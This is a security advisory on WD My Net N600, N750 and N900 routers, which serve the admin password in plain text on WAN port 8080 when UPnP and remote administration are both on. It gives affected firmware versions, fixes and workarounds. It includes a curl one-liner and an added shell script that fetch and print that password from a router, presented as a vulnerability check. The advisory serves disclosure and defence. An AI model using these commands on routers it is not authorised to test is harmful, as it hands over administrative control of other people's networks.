Vulnerable Products -

WD My Net N600 HD Dual Band Router (Wireless N WiFi Router Accelerate HD)
WD My Net N750 HD Dual Band Router (Wireless N WiFi Router Accelerate HD)
    Linux 2.6.3 kernel
    Affected firmware: Ver. 1.03.xx, 1.04.xx
    Unaffected firmware: Ver. 1.01.xx

WD My Net N900 HD Dual Band Router (Wireless N WiFi Router Accelerate HD)
WD My Net N900 Central HD Dual Band Router (2TB Storage WiFi Wireless Router)
    Affected firmware: Ver. 1.05.xx, 1.06.xx
    Unaffected firmware: Ver. 1.01.xx, 1.02.xx, 1.03.xx
    Version 1.07.16, released 05/2013, does not have this bug

--------------------------------------------------------------------------------------------------------------

Vulnerabilities -

On the WD My Net N600, N750, N900 and N900C routers, administrative credentials are stored in plain text and are easily accessible from a remote location via port 8080 on the WAN side of the router. On the affected routers, the following command displays the password value that sits openly in the PHP source served by the device:

    curl -s http://<IP>:8080/main_internet.php? -L | egrep -i 'var pass'

During initial setup, the page "main_internet.php" stores the admin password in plain text as the value of "var pass".

Port 8080 is shared by the UPnP modules and the WAN-side HTTP web service to which remote administrative access is bound by default. The inherent difficulty of writing code that fits the requirements of authentication-based (administrative) tasks on the same port as privileged services (UPnP) is apparent in the complexity with which each service is called on these units. Indeed, several of the developers' comments inside the code, as well as warnings shown to the end user in the admin GUI, concern this conflict and the risks involved.
For example, one commented-out line concerning an API function reads:

    /* 80, 443 ports can not use*//api/1.0/rest/device?owner=admin&pw=&name=" + hostname + "&rest_method=PUT";

And in the code that starts certain features which call UPnP services, the end user is warned:

    "Conflict with Remote Management service HTTP port"+": "+XG(XMLrm+"/web")+". "+"This may cause unpredictable problem. Are you sure you want to override?"

In fact, when a call is made to change the password for the admin user, or to authenticate a remote administrative user, a PHP or CGI action calls one of several module services built into UPnP, in this case DEVICE.ACCOUNT.

Ex: Changing the admin password issues the following series of requests:

    /tools_admin.php
    --> /getcfg.php (SERVICES=DEVICE.ACCOUNT%2CHTTP.WAN-1%2CALERTMSG)
    --> /hedwig.cgi (posts the privileged <postxml> module for <service>DEVICE.ACCOUNT</service>)
    --> /pigwidgeon.cgi (ACTIONS=SETCFG%2CSAVE%2CACTIVATE)
    --> /getcfg.php (sets the new cookie value and finalizes the action)

Conditions -

UPnP and remote administrative access must both be enabled for the bug to be exploitable.

-------------------------------------------------------------------------------------------------------------------

Vendor Timeline -

Western Digital has not returned any inquiries made regarding the bug.

Patches or Fixes -

WD My Net N900 and N900C: users are advised to upgrade to firmware version 1.07.16.

WD My Net N600 and N750: if a restoration to Ver. 1.01.xx firmware is available, and remote access via the internet is a required feature, users are advised to contact vendor support for how best to proceed.
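The curl one-liner in the Vulnerabilities section above only greps for the "var pass" line. The script below is an added example (written for this page, not part of the original advisory or the vendor's firmware) that tightens that check into a reusable test: extract_pass pulls the quoted value out of a fetched page body, check_host runs the same curl request against a unit's WAN address on port 8080, and classify_body reports the result. The two embedded page bodies are constructed stand-ins for an affected and an unaffected unit; the real firmware's page source is not reproduced here. Only run check_host against devices you own or are authorised to test.

```shell
#!/bin/sh
# Added example: detect the plaintext admin password leak described in the advisory.
# The sample bodies below are constructed for illustration, not copied from the device.

# extract_pass: read a page body on stdin and print the literal assigned to "var pass".
# grep -i mirrors the advisory's egrep -i 'var pass'; the case-insensitive sed
# character classes keep this portable to non-GNU sed (no I flag needed).
extract_pass() {
  grep -i 'var pass' |
    sed -n "s/.*[Vv][Aa][Rr][[:space:]]*[Pp][Aa][Ss][Ss][[:space:]]*=[[:space:]]*['\"]\([^'\"]*\)['\"].*/\1/p" |
    head -n 1
}

# classify_body: return 0 (and print the value) if the body leaks a password, 1 if not.
classify_body() {
  pass=$(printf '%s\n' "$1" | extract_pass)
  if [ -n "$pass" ]; then
    printf 'VULNERABLE: admin password present in page source: %s\n' "$pass"
    return 0
  fi
  printf 'no plaintext admin password found in page source\n'
  return 1
}

# check_host: live check of one router, using the advisory's request
# (port 8080 on the WAN side, main_internet.php with a trailing '?', follow redirects).
# Returns 0 if the password is exposed, 1 if the fetch fails or nothing leaks.
check_host() {
  host="$1"
  body=$(curl -s -m 10 -L "http://${host}:8080/main_internet.php?") || return 1
  classify_body "$body"
}

# Constructed sample: what an affected unit's page looks like (value is made up).
SAMPLE_LEAKY='<html><script>
var hostname = "wdrouter";
var pass = "s3cretAdmin";
</script></html>'

# Constructed sample: a page from a unit that does not embed the password.
SAMPLE_CLEAN='<html><script>
var hostname = "wdrouter";
</script></html>'

# Usage (offline): classify the two constructed bodies.
classify_body "$SAMPLE_LEAKY"
classify_body "$SAMPLE_CLEAN" || true
# Usage (live): check_host 203.0.113.10   (address is a placeholder, not a real target)
```

Because the leak only occurs when UPnP and remote administration are both enabled, a clean result from check_host on a unit running affected firmware does not mean the unit is patched; it may simply have remote administration turned off, which is the first workaround listed below.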
Mitigation and Workarounds for those who are not able to upgrade or downgrade firmware -

    - Turn off all remote administrative access to the router
    - Disable UPnP services
    - Change the default username and password

--------------------------------------------------------------------------------------------------------------------

Note: Critical vulnerabilities discovered in UPnP-enabled routers and other devices that are visible and reachable from the WAN have continued to rise at a very rapid pace over the past year. At DEF CON 19, Daniel Garcia gave a talk on UPnP port mapping, the risks posed by the unpredictable nature of UPnP stacks, and the danger that NAT traversal could be a possible outcome.
http://toor.do/DEFCON-19-Garcia-UPnP-Mapping-WP.pdf

In January of this year, Rapid7 security researcher HD Moore published a white paper on UPnP vulnerabilities, warning that "around 40-50 million network-enabled devices are at risk", which he explains includes "devices such as routers, printers, network-attached storage (NAS), media players and smart TVs."
https://community.rapid7.com/docs/DOC-2150

In each of the device classes he mentions, exploitable vulnerabilities have begun to surface, and also in some not yet mentioned, such as DVRs and IP web cameras. A few vendors have managed to sufficiently mitigate the risks of UPnP/DLNA services co-existing with their products' remote access capabilities; many have not. The list of home router and modem models that are still vulnerable to a known bug, or have had to issue emergency patches for a vulnerability after release, has grown to alarmingly high numbers. End users should be urged to check first with their vendor and then with one of the vulnerability databases, such as OSVDB, which appears to keep a very thorough listing, to see whether their model is among those currently known to be affected.
Discovered - 07-02-2013
Research Contact - K Lovett
Affiliation - SUSnet